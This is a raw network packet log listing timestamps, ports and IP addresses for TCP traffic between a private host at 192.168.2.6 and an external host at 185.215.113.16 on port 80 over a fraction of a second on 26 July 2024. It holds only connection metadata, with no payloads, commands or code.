Jul 26, 2024 12:57:05.491861105 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492042065 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492119074 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492134094 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492167950 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492172956 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492177963 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492183924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492201090 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492211103 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492213011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492223978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492238045 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492259979 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492655039 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492666006 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492697954 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492702961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492710114 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492721081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492732048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.492739916 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492749929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.492769957 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.493158102 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.493169069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.493204117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.493232965 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.493613005 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.493623972 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.493640900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.493652105 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.493669033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.493669987 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.493680000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.493693113 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.493705034 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.493772984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.494362116 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.494373083 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.494390965 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.494400978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.494406939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.494416952 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.494417906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.494429111 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.494437933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.494446993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.494471073 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.494491100 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.495206118 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.495217085 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.495234966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.495244026 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.495253086 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.495260954 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.495261908 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.495270967 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.495284081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.495290995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.495301962 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.495317936 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.495337009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.496216059 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496227026 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496243954 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496257067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496265888 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.496268034 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496280909 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496284008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.496304989 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.496328115 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.496902943 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496913910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496927023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496938944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496946096 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.496953964 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496956110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.496965885 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.496973038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496980906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.496987104 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.497005939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.497033119 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.497747898 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.497759104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.497776031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.497785091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.497795105 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.497802973 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.497813940 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.497813940 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.497826099 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.497838974 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.497847080 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.497869968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499008894 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499021053 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499034882 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499044895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499058008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499058008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499058008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499073982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499074936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499089956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499118090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499298096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499310017 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499322891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499335051 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499344110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499351025 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499353886 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499367952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499372005 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499377012 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.499394894 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.499412060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.521203041 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.521226883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.521249056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.521409988 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.521409988 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.521554947 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.521687031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.522383928 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.522394896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.522417068 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.522433996 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.522449017 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.548566103 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.548780918 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.548877001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.548903942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.548913956 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.548928022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.548944950 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.548960924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.549019098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.549019098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.549019098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.549019098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.549189091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.549251080 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.549257040 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.549267054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.549304008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.549319983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.549597025 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.549607038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.549628019 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.549638033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.549654961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.549689054 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550017118 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550067902 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550074100 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550076962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550110102 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550124884 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550273895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550283909 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550302029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550311089 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550318956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550347090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550805092 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550853968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550873995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550884962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550900936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550909996 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.550915956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550925970 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550945997 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.550957918 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.551455021 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551464081 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551481009 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551489115 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551502943 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.551506042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551516056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551527977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.551554918 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.551861048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551871061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551887989 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551897049 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551908016 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.551915884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551923037 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.551942110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.551970959 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.590656996 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.590879917 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.590914965 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.590935946 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.590953112 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.590961933 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.590979099 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.590987921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591005087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591196060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.591408968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591428041 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591438055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591454029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591464043 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591478109 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591490984 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.591667891 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.592406988 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.592417955 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.592434883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.592444897 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.592459917 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.592462063 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.592468977 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.592473984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.592498064 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.592500925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.592511892 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.592533112 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.592560053 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.593352079 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.593363047 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.593378067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.593386889 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.593403101 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.593404055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.593414068 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.593425989 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.593432903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.593432903 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.593442917 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.593457937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.593467951 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.593477011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.594357014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.594367981 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.594383955 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.594393969 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.594403982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.594407082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.594424009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.594424963 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.594434023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.594443083 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.594453096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.594459057 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.594484091 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.594485044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.595269918 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.595280886 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.595298052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.595305920 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.595315933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.595324993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.595335007 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.595335960 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.595350981 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.595355034 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.595361948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.595367908 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.595390081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.595410109 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.596221924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.596231937 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.596254110 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.596261978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.596266031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.596276045 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.596280098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.596288919 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.596292973 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.596302032 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.596304893 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.596311092 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.596329927 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.596339941 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.597214937 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.597225904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.597242117 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.597250938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.597259998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.597268105 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.597273111 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.597278118 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.597294092 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.597295046 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.597304106 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.597307920 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.597328901 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.597347021 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.598046064 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.598057032 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.598073959 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.598083973 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.598098993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.598134041 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.598148108 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.612349033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.612365007 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.612385035 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.612452030 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.612591028 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.612601995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.612618923 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.612659931 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.612675905 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.612885952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.612941027 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.641937971 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642016888 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642179012 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642218113 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642249107 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642262936 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642328024 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642338037 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642362118 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642373085 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642379045 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642390966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642396927 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642400026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642425060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642440081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642642021 CEST	80	60778	185.215.113.16	192.168.2.6
